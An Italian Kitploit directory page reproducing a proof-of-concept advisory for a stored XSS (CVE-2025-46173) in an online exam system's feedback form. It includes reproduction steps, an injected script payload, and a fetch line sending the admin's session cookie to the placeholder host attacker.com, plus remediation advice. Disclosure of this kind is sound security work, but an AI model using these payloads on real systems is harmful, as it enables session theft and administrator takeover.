Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-46173 — PoC per la CVE-2025-46173 | Kitploit
Strumenti/GitHubGitHub/pruthuraut/cve-2025-46173
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

PoC per la CVE-2025-46173

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-46173 - Cross-Site Scripting (XSS) memorizzato in Online Exam Mastering System 1.0

📌 Riepilogo

CVE-2025-46173 è una vulnerabilità di Cross-Site Scripting (XSS) memorizzato scoperta in Online Exam Mastering System 1.0 di code-projects. La vulnerabilità è presente nel componente feedback.php, dove l'input utente nel campo nome non viene adeguatamente sanificato, consentendo a un attaccante di iniettare JavaScript arbitrario. Quando un amministratore visualizza il feedback nella dashboard di amministrazione (dash.php), il payload viene eseguito nel browser dell'amministratore, portando al dirottamento della sessione e a una potenziale escalation dei privilegi.


🧠 Dettagli della vulnerabilità

  • Tipo di vulnerabilità: Cross-Site Scripting (XSS) memorizzato
  • ID CVE: CVE-2025-46173
  • Fornitore: code-projects
  • Prodotto: Online Exam Mastering System
  • Versione interessata: 1.0
  • Componente: feedback.php,
Scarica lo strumento
dash.php
  • Vettore di attacco: Remoto
  • Impatto: Escalation dei privilegi, dirottamento della sessione

  • 📷 Prova di concetto

    1. Iniezione

    Un utente invia il seguente payload nel campo Nome nel modulo di feedback:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    

    Payload nel modulo di feedback

    2. Attivazione

    Quando l'amministratore visualizza successivamente il feedback inviato in dash.php, il payload viene eseguito:

    Attivazione XSS da parte dell'amministratore

    3. Risultato

    Il cookie di sessione dell'amministratore viene esposto tramite document.cookie e può essere esfiltrato:

    root@kitploit:~
    <script>
      fetch("http://attacker.com/steal?cookie=" + document.cookie);
    </script>
    

    ⚙️ Passaggi per la riproduzione

    1. Clonare o configurare la versione vulnerabile da code-projects.

    2. Navigare a localhost/exam/feedback.php.

    3. Compilare il campo "Nome" con:

      root@kitploit:~
      <script>alert(document.cookie)</script>
      
    4. Inviare il modulo.

    5. Accedere come amministratore e visitare dash.php?q=3 per visualizzare il feedback.

    6. Lo script verrà eseguito nel contesto dell'amministratore.


    🔥 Impatto

    Lo sfruttamento riuscito consente a un attaccante remoto di:

    • Rubare i cookie di sessione dell'amministratore
    • Impersonare l'utente amministratore
    • Ottenere pieno accesso amministrativo
    • Modificare o eliminare i dati dei test
    • Elevare i privilegi

    🔒 Rimedio consigliato

    • Sanificare l'input utente effettuando l'escaping dei caratteri HTML speciali (ad es., &, <, >, ").
    • Utilizzare una libreria di sanificazione robusta come htmlspecialchars() di PHP o una combinazione di validazione frontend e sanificazione backend.
    • Implementare una Content Security Policy (CSP).
    • Valutare la codifica dei dati prima di renderizzarli nel DOM.

    🔗 Riferimenti

    • Blind Cross-Site Scripting (Invicti)
    • Acunetix - Rilevamento della Blind XSS
    • Cheat Sheet OWASP per la prevenzione delle XSS

    👤 Scopritore

    Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


    Gli screenshot sono solo a scopo educativo. Tutti i test sono stati effettuati in un ambiente locale.

    🎥 Video PoC

    Clicca qui per guardare il video demo


    ⚠️ Esclusione di responsabilità

    Queste informazioni sono fornite solo a scopo educativo e di ricerca. Non utilizzarle su sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita a testare.